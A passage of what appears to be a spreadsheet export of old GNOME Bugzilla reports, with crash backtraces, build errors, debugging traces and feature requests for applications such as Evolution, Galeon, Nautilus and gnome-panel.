#9  0x0808ed47 in panel_widget_draw_icon () at eval.c:41
#10 0x403fecb8 in gtk_marshal_NONE__POINTER () from /usr/lib/libgtk-1.2.so.0
#11 0x404315f1 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#12 0x4042f525 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x40468b18 in gtk_widget_size_allocate () from /usr/lib/libgtk-1.2.so.0
#14 0x403e3192 in gtk_frame_size_allocate () from /usr/lib/libgtk-1.2.so.0
#15 0x403fecb8 in gtk_marshal_NONE__POINTER () from /usr/lib/libgtk-1.2.so.0
#16 0x404315f1 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#17 0x4042f525 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x40468b18 in gtk_widget_size_allocate () from /usr/lib/libgtk-1.2.so.0
#19 0x403b9dd0 in gtk_container_resize_children ()
   from /usr/lib/libgtk-1.2.so.0
#20 0x4047341f in gtk_window_move_resize () from /usr/lib/libgtk-1.2.so.0
#21 0x40472ca1 in gtk_window_check_resize () from /usr/lib/libgtk-1.2.so.0
#22 0x403fede1 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#23 0x404317ad in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x4042f525 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#25 0x403b9a8d in gtk_container_check_resize () from /usr/lib/libgtk-1.2.so.0
#26 0x403b96f9 in gtk_container_idle_sizer () from /usr/lib/libgtk-1.2.so.0
#27 0x404e379d in g_idle_dispatch () from /usr/lib/libglib-1.2.so.0
#28 0x404e2773 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#29 0x404e2d39 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#30 0x404e2eec in g_main_run () from /usr/lib/libglib-1.2.so.0
#31 0x403fd333 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#32 0x0805ed52 in main () at eval.c:41
#33 0x40511507 in __libc_start_main (main=0x805ea10  argc=3 
    ubp_av=0xbffffc44 init=0x8056b50  fini=0x80ab690  
    rtld_fini=0x4000dc14  stack_end=0xbffffc3c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x405af669 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x4062b154 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4015be88 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x40575221 in chunk_alloc (ar_ptr=0x40629620 nb=56) at malloc.c:2878
	in malloc.c
victim = 0x8183300
victim_size = 56
idx = 7
bin = 0xfffffe00
remainder = 0x404d2068
remainder_size = -1073747568
remainder_index = 1073832704
block = 135045560
startidx = 134963248
fwd = 0x0
bck = 0x80b6030
q = 0x0
victim_size = 56
idx = 7
remainder = 0x404d2068
remainder_index = 1073832704
block = 135045560
#5  0x40576b47 in __libc_calloc (n=52 elem_size=1) at malloc.c:3844
3844	in malloc.c
n = 3221219728
elem_size = 0
ar_ptr = (arena *) 0x40629620
p = 0x40629620
oldtop = 0x8196798
sz = 56
csz = 3221219728
oldtopsize = 10344
mem = (void *) 0x4045bf4b
hook = (void *(*)()) 0xfffffe00
oldtop = 0x8196798
sz = 56
oldtopsize = 10344
mem = (void *) 0x4045bf4b
#6  0x404e391b in g_malloc0 () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x404b7f82 in gdk_pixmap_new () from /usr/lib/libgdk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-11-02 18:10 -------
The original reporter (mdeiss@indy.rr.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jacob@ximian.com.
</t>
  </si>
  <si>
    <t>mdeiss</t>
  </si>
  <si>
    <t>ACME-164544</t>
  </si>
  <si>
    <t>does not compile</t>
  </si>
  <si>
    <t>Please describe the problem:
acme.c: In function `do_close_window_action':
acme.c:822: error: too few arguments to function `wnck_window_close'
Steps to reproduce:
1. install Debian GNU/Linux unstable (sid)
2. compile
3. 
Actual results:
Expected results:
compiles ok
Does this happen every time?
yes
Other information:
no</t>
  </si>
  <si>
    <t>loic</t>
  </si>
  <si>
    <t>GALEON-111560</t>
  </si>
  <si>
    <t>bookmark menus don't appear to obey they gtk theme</t>
  </si>
  <si>
    <t>In the bookmarks menu of the menubar and any folders on the toolbar menu
items do not obey the gtk theme (raleigh).
The way it should look is the way the Add Bookmarks and Edit Bookmarks
items are (see
http://www.bridgewayconsulting.com.au/~davyd/galeon-shots/galeon-correct.png).
Instead it fails to highlight the selected item in white (as shown in
http://www.bridgewayconsulting.com.au/~davyd/galeon-shots/galeon-incorrect.png).</t>
  </si>
  <si>
    <t>GNOME-CORE-13120</t>
  </si>
  <si>
    <t>cursor blinks when terminal window is first mapped even if not focused</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-terminal
Severity: normal
Version:  1.2
Synopsis: cursor blinks when terminal window is first mapped even if not focused
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.15-bos i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit-0.5.1-0_helix_2
gnome-libs: gnome-libs-1.2.0-0_helix_2
libxml: libxml-1.8.7-0_helix_1
gnome-print: gnome-print-0.20-0_helix_1
gnome-core: gnome-core-1.2.0-0_helix_4
Description:
I am using gnome-terminal 1.2 from Helix Code's Preview 2.  I have the
blinking cursor option enabled. If I pop up a new gnome-terminal window
the cursor in that window blinks regardless of whether or not the window
actually has the focus. This shouldn't happen - the cursor should only
blink if the window has the focus.
This isn't a very serious bug it's mostly cosmetic but it is kind of
confusing and distracting.  Focusing on the window and then removing the
focus causes everything to behave sanely again but I'd rather not have
to do that.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:17 -------
This bug was previously known as bug 13120 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=13120
Originally filed under the gnome-core product and gnome-terminal component.
The original reporter (bos@serpentine.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>bos</t>
  </si>
  <si>
    <t>NAUTILUS-79223</t>
  </si>
  <si>
    <t>arrow keys to open folder</t>
  </si>
  <si>
    <t>Like the mac alt-down should open the folder. It is then easier to
navigate to a folder using the cursor keys and then open it without taking
your right-hand off the cursor keys (as required by [ctrl]-o at the
moment). It's also less keys to press.
We need to use [alt] for this because [ctrl]-arrows moves the focus in GTK+
(I think - it might be a WM thing). I have no idea what the point of that is.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-126244</t>
  </si>
  <si>
    <t>CVS HEAD build is broken</t>
  </si>
  <si>
    <t>The current head build breaks inside gst-mixer/src/mixer.c due to recent
changes in GstElementFactory in GStreamer.</t>
  </si>
  <si>
    <t>PYGTK-97436</t>
  </si>
  <si>
    <t>Crash in pygtk_generic_cell_renderer_get_size() (NULL deref)</t>
  </si>
  <si>
    <t>I am seeing crashes in pygtk_generic_cell_renderer_get_size() in the call
to PyArg_ParseTuple().  The values for x_offset and y_offset could be NULL
so they are dereferenced and python crashes.
I am attaching a patch which fixes this.</t>
  </si>
  <si>
    <t>GNOME-CALENDAR-745487</t>
  </si>
  <si>
    <t>GNOME-CALENDAR</t>
  </si>
  <si>
    <t>Missing colors caused by some evolution calendar sources</t>
  </si>
  <si>
    <t>Created attachment 298357
app: Fix missing colors caused by some evolution calendar sources
I have some evolution calendar sources with colors that are represented as long hexadecimal string such as #fcfcafaf3e3e. These are used to generate CSS from but are not valid CSS colors which results in errors such as this:
** (gnome-calendar:27761): WARNING **: Error creating custom stylesheet. :5:40Junk at end of value
I'm attaching a patch that fixes this. Feel free to push it if you think it is correct since I've not applied for a git account yet.</t>
  </si>
  <si>
    <t>gnome-calendar-maint</t>
  </si>
  <si>
    <t>EKIGA-526530</t>
  </si>
  <si>
    <t>Freeze of video output thread on XSync</t>
  </si>
  <si>
    <t>On some systems the video output thread freezes after some time. It happens with both X and XVideo output and both on x86 and x64 architectures. It happens only in the embedded window but not in the external window. It seems to happen faster when moving the mouse on the video window. The function calls when freezen look like this:
2008/02/05 23:01:42.978      0:20.530           GMDisplayManager    virtual bool XWindow::ProcessEvents() enter
2008/02/05 23:01:42.978      0:20.530           GMDisplayManager    XLockDisplay
2008/02/05 23:01:42.978      0:20.530           GMDisplayManager    XCheckWindowEvent
2008/02/05 23:01:42.978      0:20.530           GMDisplayManager    XUnlockDisplay
2008/02/05 23:01:42.978      0:20.530           GMDisplayManager    virtual bool XWindow::ProcessEvents() leave
2008/02/05 23:01:42.979      0:20.531           GMDisplayManager    virtual void XWindow::PutFrame(uint8_t* uint16_t uint16_t) enter
2008/02/05 23:01:42.979      0:20.531           GMDisplayManager    XLockDisplay
2008/02/05 23:01:42.979      0:20.531           GMDisplayManager    CreateXImage
2008/02/05 23:01:42.979      0:20.531           GMDisplayManager    Convert
2008/02/05 23:01:42.980      0:20.532           GMDisplayManager    Scale
2008/02/05 23:01:42.980      0:20.532           GMDisplayManager    XShmPutImage
2008/02/05 23:01:42.980      0:20.532           GMDisplayManager    XUnlockDisplay
2008/02/05 23:01:42.980      0:20.532           GMDisplayManager    virtual void XWindow::PutFrame(uint8_t* uint16_t uint16_t) leave
2008/02/05 23:01:42.980      0:20.532           GMDisplayManager    virtual void XWindow::Sync() enter
2008/02/05 23:01:42.980      0:20.532           GMDisplayManager    XSync
2008/02/05 23:01:42.981      0:20.533           GMDisplayManager    virtual void XWindow::Sync() leave
2008/02/05 23:01:43.012      0:20.564           GMDisplayManager    virtual bool XWindow::ProcessEvents() enter
2008/02/05 23:01:43.012      0:20.564           GMDisplayManager    XLockDisplay
2008/02/05 23:01:43.012      0:20.564           GMDisplayManager    XCheckWindowEvent
2008/02/05 23:01:43.012      0:20.564           GMDisplayManager    XUnlockDisplay
2008/02/05 23:01:43.012      0:20.564           GMDisplayManager    virtual bool XWindow::ProcessEvents() leave
2008/02/05 23:01:43.013      0:20.565           GMDisplayManager    virtual void XWindow::PutFrame(uint8_t* uint16_t uint16_t) enter
2008/02/05 23:01:43.013      0:20.565           GMDisplayManager    XLockDisplay
2008/02/05 23:01:43.013      0:20.565           GMDisplayManager    CreateXImage
2008/02/05 23:01:43.013      0:20.565           GMDisplayManager    Convert
2008/02/05 23:01:43.014      0:20.566           GMDisplayManager    Scale
2008/02/05 23:01:43.014      0:20.566           GMDisplayManager    XShmPutImage
2008/02/05 23:01:43.014      0:20.566           GMDisplayManager    XUnlockDisplay
2008/02/05 23:01:43.014      0:20.566           GMDisplayManager    virtual void XWindow::PutFrame(uint8_t* uint16_t uint16_t) leave
2008/02/05 23:01:43.014      0:20.566           GMDisplayManager    virtual void XWindow::Sync() enter
2008/02/05 23:01:43.014      0:20.566           GMDisplayManager    XSync
At least two people (Yannick and Franz) have been able to reproduce this issue.
Once the video thread is frozen it does no longer collect the images grabbed/decoded by the transport threads. That produces lots of the following messages:
2008/02/03 12:56:29.722      0:17.276    GMVideoGrabber:082d5b00    GMDisplayManager    Skipped earlier local frame
It does not seem to be a input event queue overrun. A special trace done by Franz reveals the following:
2008/02/03 12:56:29.222      0:16.776           GMDisplayManager    Events in Queue: 0
2008/02/03 12:56:29.322      0:16.876           GMDisplayManager    Events in Queue: 0
2008/02/03 12:56:29.423      0:16.977           GMDisplayManager    Events in Queue: 0
2008/02/03 12:56:29.523      0:17.077           GMDisplayManager    Events in Queue: 0
2008/02/03 12:56:29.722      0:17.276    GMVideoGrabber:082d5b00    GMDisplayManager    Skipped earlier local frame
2008/02/03 12:56:29.822      0:17.376    GMVideoGrabber:082d5b00    GMDisplayManager    Skipped earlier local frame
2008/02/03 12:56:29.922      0:17.476    GMVideoGrabber:082d5b00    GMDisplayManager    Skipped earlier local frame</t>
  </si>
  <si>
    <t>ma30002000</t>
  </si>
  <si>
    <t>GNOME-PANEL-139229</t>
  </si>
  <si>
    <t>Foot applications icons not theming</t>
  </si>
  <si>
    <t>The main menu icon and the Applications icon on the main menu currently don't
pick up a theme change unless I restart the panel.  (And even then only
sometimes in the case of the main menu icon.)</t>
  </si>
  <si>
    <t>GTK+-468793</t>
  </si>
  <si>
    <t xml:space="preserve">GtkBuilder ignores  after </t>
  </si>
  <si>
    <t>I just noticed that signals that get declared after a  block do not end up in the builder's signal list. That's with 2.11.6 btw.
If you cannot easily reproduce it I'll provide a patch but I'm lazy. :)</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-171431</t>
  </si>
  <si>
    <t>same-gnome: HIG Fixes</t>
  </si>
  <si>
    <t>I am attaching a patch to fix HIG issues with same-gnome's theme dialog.</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-302618</t>
  </si>
  <si>
    <t>[PATCH] Can't burn ISO images on DVD</t>
  </si>
  <si>
    <t>With large-iso-image.iso being a 2 GB iso image
$ ./nautilus-cd-burner --source-iso=/home/hadess/large-iso-image.iso
** (lt-nautilus-cd-burner:20016): WARNING **: Can only use growisofs on a data track
An error message will show up with the Details segfaulting n-c-b and OK
leaving a unclosable progress window.</t>
  </si>
  <si>
    <t>GNOME-PANEL-112983</t>
  </si>
  <si>
    <t>About dialog remains even after removal of clock applet</t>
  </si>
  <si>
    <t>1. Add  clock applet to panel.
2. Right Click on applet. And start the about dialog.
3. Right Click again and remove the applet from the panel.
Observation : The about dialog remains. It doesnt go away with the applet.
Expected behaviour - The about dialog of the applet should dissappear.</t>
  </si>
  <si>
    <t>EVOLUTION-213893</t>
  </si>
  <si>
    <t>mailer crash when trying to view mail</t>
  </si>
  <si>
    <t>A filter rule had just moved a message from Inbox to Junk.  In the Junk
mailbox I clicked on the message that was just moved in there hit ^d
clicked on the message above it (only two in Junk both new) hit ^d got a
crash.  Stack (as reported by pstack much quicker than GDB) was:
792:
evolution-mail --oaf-activate-iid=OAFIID:GNOME_Evolution_Mail_ShellCom
-----------------  lwp# 1 / thread# 1  --------------------
 fde99254 waitid   (0 3b0 ffbfd630 3)
 fde555e4 _waitpid (3b0 ffbfd774 0 fefcce18 0 0) + 5c
 fefce418 waitpid  (3b0 ffbfd774 0 0 0 0) + 5c
 fe588fdc gnome_segv_handle (b fe588f2c 0 0 0 0) + b0
 000603cc segv_redirect (b 0 ffbfd9d8 0 0 0) + 28
 fefd4048 __sighndlr (b 0 ffbfd9d8 603a4 0 0) + c
 fefceffc call_user_handler (b 0 ffbfd9d8 0 0 0) + 1e4
 fefcf1ac sigacthandler (b 0 ffbfd9d8 7efefeff 81010100 16a660) + 64
 --- called from signal handler with signal 11 (SIGSEGV) ---
 fde32724 strlen   (a9160 0 fdeba264 fdeb6000 0 0) + 80
 fde817b4 printf   (a9160 0 0 fdeb6000 0 0) + f4
 000637dc on_cursor_activated_idle (63ee50 ff000000 fdf7bf4c ca520
5e88 5a30c8) + 28
 fdf574d8 g_idle_dispatch (637b4 ffbfeb68 63ee50 0 0 ffbfeac0) + 4
 fdf55ee8 g_main_dispatch (470 470 4d4 ab8 4d4 ab8) + 128
 fdf56784 g_main_iterate (fdf7bf4c fdf7beb8 4d4 ab8 4d4 ab8) + 7bc
 fdf56998 g_main_run (15a1c8 ca3a0 d45d0 0 ff3f46a4 5) + b8
 fe0c2110 gtk_main (2c00 c9800 0 0 0 0) + 10c
 fe84ad40 bonobo_main (ca400 fdf90b70 0 fe2c9818 fe2c9828 fe2c9820) + c
 0006059c main     (3 ffbfedf4 ffbfee04 ca088 0 0) + 1ac
 0002d810 _start   (0 0 0 0 0 0) + 5c
-----------------  lwp# 2 / thread# 2  --------------------
 fde98c78 lwp_cond_wait (15ab80 155248 0)
 fefd1cbc cond_wait_kernel (15ab80 155248 0 fefe6000 fefe6000 0) + b0
 fefd1ed0 cond_wait_common (0 155248 0 0 0 0) + 188
 fefd2134 cond_wait (15ab80 155248 fefd2120 fdb7bf10 0 0) + 14
 ff367fe8 e_msgport_wait (df260 1 1 0 0 0) + b8
 ff3685b0 thread_dispatch (159668 0 0 0 0 0) + 64
 fefd3d24 _lwp_start (0 0 0 0 0 0)
-----------------  lwp# 3 / thread# 3  --------------------
 fde98c78 lwp_cond_wait (15ab98 155268 0)
 fefd1cbc cond_wait_kernel (15ab98 155268 0 fefe6000 fefe6000 2) + b0
 fefd1ed0 cond_wait_common (0 155268 0 0 0 0) + 188
 fefd2134 cond_wait (15ab98 155268 fefd2120 fda7bf10 0 0) + 14
 ff367fe8 e_msgport_wait (df2d8 1 1 0 0 0) + b8
 ff3685b0 thread_dispatch (1596c0 0 0 0 0 0) + 64
 fefd3d24 _lwp_start (0 0 0 0 0 0)
-----------------  lwp# 5 / thread# 5  --------------------
 fde98c78 lwp_cond_wait (15abb0 155288 0)
 fefd1cbc cond_wait_kernel (15abb0 155288 0 fefe6000 fefe6000 0) + b0
 fefd1ed0 cond_wait_common (0 155288 0 0 0 0) + 188
 fefd2134 cond_wait (15abb0 155288 fefd2120 fd8fbf10 0 0) + 14
 ff367fe8 e_msgport_wait (df300 3 1 0 0 0) + b8
 ff3685b0 thread_dispatch (159718 0 0 0 0 0) + 64
 fefd3d24 _lwp_start (0 0 0 0 0 0)
-----------------  lwp# 6 / thread# 6  --------------------
 fde98c78 lwp_cond_wait (1a3c98 1ae3a8 0)
 fefd1cbc cond_wait_kernel (1a3c98 1ae3a8 0 fefe6000 fefe6000 0) + b0
 fefd1ed0 cond_wait_common (0 1ae3a8 0 0 0 0) + 188
 fefd2134 cond_wait (1a3c98 1ae3a8 fefd2120 fd6fbf10 0 0) + 14
 ff367fe8 e_msgport_wait (1c53a8 1 1 0 0 0) + b8
 ff3685b0 thread_dispatch (16db50 0 0 0 0 0) + 64
 fefd3d24 _lwp_start (0 0 0 0 0 0)
-----------------  lwp# 8 / thread# 8  --------------------
 fde98c78 lwp_cond_wait (15abb0 155288 0)
 fefd1cbc cond_wait_kernel (15abb0 155288 0 fefe6000 fefe6000 0) + b0
 fefd1ed0 cond_wait_common (0 155288 0 0 0 0) + 188
 fefd2134 cond_wait (15abb0 155288 fefd2120 fd5fbf10 0 0) + 14
 ff367fe8 e_msgport_wait (df300 3 1 0 0 0) + b8
 ff3685b0 thread_dispatch (159718 0 0 0 0 0) + 64
 fefd3d24 _lwp_start (0 0 0 0 0 0)
-----------------  lwp# 9 / thread# 9  --------------------
 fde98c78 lwp_cond_wait (15abb0 155288 0)
 fefd1cbc cond_wait_kernel (15abb0 155288 0 fefe6000 fefe6000 0) + b0
 fefd1ed0 cond_wait_common (0 155288 0 0 0 0) + 188
 fefd2134 cond_wait (15abb0 155288 fefd2120 fd47bf10 0 0) + 14
 ff367fe8 e_msgport_wait (df300 3 1 0 0 0) + b8
 ff3685b0 thread_dispatch (159718 0 0 0 0 0) + 64
 fefd3d24 _lwp_start (0 0 0 0 0 0)</t>
  </si>
  <si>
    <t>Michael.Gerdts</t>
  </si>
  <si>
    <t>EVOLUTION-350267</t>
  </si>
  <si>
    <t>little calendar has gone missing from the RHS</t>
  </si>
  <si>
    <t>There used to be a little calendar on the RHS above the tasks. Now there is Tasks and Memos but no calendar. I assume the calendar is actually there but has just been pushed out of the way. There is no drag handle I can find to drag it back.</t>
  </si>
  <si>
    <t>EVOLUTION-211759</t>
  </si>
  <si>
    <t>color filters ignored in inbox</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.15
Synopsis: color filters ignored in inbox
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I have several inbound filters that set color on messages.
The colors on Incoming messages are not being set according to my
filters.
If I select the messages and click Actions-&gt;Apply FIlters they are then
properly set.
</t>
  </si>
  <si>
    <t>pbaker</t>
  </si>
  <si>
    <t>GNUCASH-525821</t>
  </si>
  <si>
    <t>new or edited account names should be checked for reserved chars like :</t>
  </si>
  <si>
    <t>Please describe the problem:
According https://lists.gnucash.org/pipermail/gnucash-de/2008-April/005843.html ff I watched that you can enter account names which contain reserved characters like : which is the delimiter between the elements of the account tree. 
If you then try to make invoice payments on this account or accounts below this in the hierarchy you get the error message Your selected post account %s does not exist. 
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Yep
Other information:
We talked about this on IRC http://lists.gnucash.org/logs/2008/04/2008-04-02.html#T13:58:16
Special watch that possible some bug was reintroduced in xaccGetAccountByFullName()</t>
  </si>
  <si>
    <t>frank.h.ellenberger</t>
  </si>
  <si>
    <t>GALEON-118690</t>
  </si>
  <si>
    <t>Browser crash unknown reasons</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: GNOME2.2.2 1.3.5
os_details: Ximian Inc.
Synopsis: Browser crash unknown reasons
Bugzilla-Product: galeon
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
Walked away from browser came back it was crashed.  Has slashdot.org
open in 2 tabs and the bioware.com neverwinter nights site in another. 
I use the flash + java plugins ( j2re 1.4.2 beta ) but I do not believe
there was any flash or java executing.
Steps to reproduce the problem:
1. not sure was taking no actions at time of crash
2. 
3. 
Actual Results:
N/A
Expected Results:
N/A
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/galeon-bi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New
Thread 1092170336 (LWP 1253)]
[New Thread 1151229232 (LWP 1372)]
[New Thread 1133735216 (LWP 1292)]
[New Thread 1125342512 (LWP 1290)]
[New Thread 1116949808 (LWP 1289)]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xffffe002 in ?? ()
#0  0xffffe002 in ?? ()
#1  0x4018b08a in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  
#3  0x4207a703 in strlen () from /lib/tls/libc.so.6
#4  0x42062412 in fputs () from /lib/tls/libc.so.6
#5  0x080b5905 in global_history_get_type ()
#6  0x40de5478 in g_hash_table_foreach () from
/usr/lib/libglib-2.0.so.0
#7  0x080b5b61 in global_history_get_type ()
#8  0x080b5c6a in global_history_save_if_needed ()
#9  0x40defabb in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
#10 0x40ded4ae in unblock_source () from /usr/lib/libglib-2.0.so.0
#11 0x40dee3dd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#12 0x40dee6e3 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#13 0x40deed42 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#14 0x402785cd in bonobo_main () from /usr/lib/libbonobo-2.so.0
#15 0x08095faf in main ()
#16 0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
Thread 5 (Thread 1116949808 (LWP 1289)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x0810f268 in PR_OpenDir ()
No symbol table info available.
#2  0x4156085e in NSGetModule ()
   from /usr/lib/mozilla-1.3.1/components/libnecko.so
No symbol table info available.
#3  0x41561071 in NSGetModule ()
   from /usr/lib/mozilla-1.3.1/components/libnecko.so
No symbol table info available.
#4  0x400fbb31 in nsThread::Main(void*) ()
   from /usr/lib/mozilla-1.3.1/libxpcom.so
No symbol table info available.
#5  0x0811063d in PR_Select ()
No symbol table info available.
#6  0x40d4f332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 1125342512 (LWP 1290)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x415699c1 in NSGetModule ()
   from /usr/lib/mozilla-1.3.1/components/libnecko.so
No symbol table info available.
#2  0x415693d1 in NSGetModule ()
   from /usr/lib/mozilla-1.3.1/components/libnecko.so
No symbol table info available.
#3  0x400fbb31 in nsThread::Main(void*) ()
   from /usr/lib/mozilla-1.3.1/libxpcom.so
No symbol table info available.
#4  0x0811063d in PR_Select ()
No symbol table info available.
#5  0x40d4f332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1133735216 (LWP 1292)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x400ff379 in TimerThread::Run() () from
/usr/lib/mozilla-1.3.1/libxpcom.so
No symbol table info available.
#2  0x400fbb31 in nsThread::Main(void*) ()
   from /usr/lib/mozilla-1.3.1/libxpcom.so
No symbol table info available.
#3  0x0811063d in PR_Select ()
No symbol table info available.
#4  0x40d4f332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 1151229232 (LWP 1372)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x400fca87 in nsThreadPool::GetRequest(nsIThread*) ()
   from /usr/lib/mozilla-1.3.1/libxpcom.so
No symbol table info available.
#2  0x400fd2ce in nsThreadPoolRunnable::Run() ()
   from /usr/lib/mozilla-1.3.1/libxpcom.so
No symbol table info available.
#3  0x400fbb31 in nsThread::Main(void*) ()
   from /usr/lib/mozilla-1.3.1/libxpcom.so
No symbol table info available.
#4  0x0811063d in PR_Select ()
No symbol table info available.
#5  0x40d4f332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1092170336 (LWP 1253)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4018b08a in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x4207a703 in strlen () from /lib/tls/libc.so.6
No symbol table info available.
#4  0x42062412 in fputs () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x080b5905 in global_history_get_type ()
No symbol table info available.
#6  0x40de5478 in g_hash_table_foreach () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x080b5b61 in global_history_get_type ()
No symbol table info available.
#8  0x080b5c6a in global_history_save_if_needed ()
No symbol table info available.
#9  0x40defabb in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x40ded4ae in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x40dee3dd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x40dee6e3 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#13 0x40deed42 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#14 0x402785cd in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#15 0x08095faf in main ()
No symbol table info available.
#16 0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
No symbol table info available.
#0  0xffffe002 in ?? ()
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-07-30 13:01 -------
Unknown version 1.3.x in product galeon. Setting version to the default unspecified.
The original reporter (derek.richardson@ieee.org) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component galeon-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>derek.richardson</t>
  </si>
  <si>
    <t>GUCHARMAP-349664</t>
  </si>
  <si>
    <t>Add padding to Copy button</t>
  </si>
  <si>
    <t>The Copy button looks quite cramped.
The HIG recommends 12 pixels of horizontal padding for button labels.</t>
  </si>
  <si>
    <t>PYGTK-163932</t>
  </si>
  <si>
    <t>autogen.sh fails with automake 1.8</t>
  </si>
  <si>
    <t>gtk/Makefile.am:86: Cannot apply `+=' because `pygtkexec_LTLIBRARIES' is not
defined in
gtk/Makefile.am:86: the following conditions:
gtk/Makefile.am:86:   !BUILD_GTK and BUILD_LIBGLADE
gtk/Makefile.am:86: Either define `pygtkexec_LTLIBRARIES' in these conditions
or use
gtk/Makefile.am:86: `+=' in the same conditions as the definitions.
gtk/Makefile.am: installing `./compile'
gtk/Makefile.am:92: unused variable: `glade_la_SOURCES'
gtk/Makefile.am:93: unused variable: `nodist_glade_la_SOURCES'
gtk/Makefile.am:91: unused variable: `glade_la_LIBADD'
gtk/Makefile.am:90: unused variable: `glade_la_LDFLAGS'
gtk/Makefile.am:86: Cannot apply `+=' because `pygtkexec_LTLIBRARIES' is not
defined in
gtk/Makefile.am:86: the following conditions:
gtk/Makefile.am:86:   !BUILD_GTK and BUILD_LIBGLADE
gtk/Makefile.am:86: Either define `pygtkexec_LTLIBRARIES' in these conditions
or use
gtk/Makefile.am:86: `+=' in the same conditions as the definitions.
gtk/Makefile.am:92: unused variable: `glade_la_SOURCES'
gtk/Makefile.am:93: unused variable: `nodist_glade_la_SOURCES'
gtk/Makefile.am:91: unused variable: `glade_la_LIBADD'
gtk/Makefile.am:90: unused variable: `glade_la_LDFLAGS'</t>
  </si>
  <si>
    <t>BANSHEE-344723</t>
  </si>
  <si>
    <t>Make smart playlists children of the Library</t>
  </si>
  <si>
    <t>Like regular playlists smart playlists should be children of the Library source.</t>
  </si>
  <si>
    <t>SEAHORSE-159629</t>
  </si>
  <si>
    <t>Agent info window shows 'Unknown/Invalid Key' instead of Key</t>
  </si>
  <si>
    <t>Use seahorse-agent sign a file and click on the lock to make the info window
appear. It will show 'Unknown/Invalid Key' string instead of the key for which
the passphrase is being cached.</t>
  </si>
  <si>
    <t>JHBUILD-105766</t>
  </si>
  <si>
    <t>Xchat support in gnome22 moduleset</t>
  </si>
  <si>
    <t>xchat is not in the gnome22 moduleset</t>
  </si>
  <si>
    <t>GNOME-UTILS-304034</t>
  </si>
  <si>
    <t>.po file typos</t>
  </si>
  <si>
    <t>1.
po:10
reference:	â‘¤	../gdictsrc/dict.c:690
Original:	âŒ˜0	
A serious error occured. Please check that your server and port are correct. 
For reference the default server is dict.org and the port 2628
(occurred)
2.
#: ../gsearchtool/gsearchtool.c:773
# c-format
msgid %d File Found
msgid_plural %d Files Found
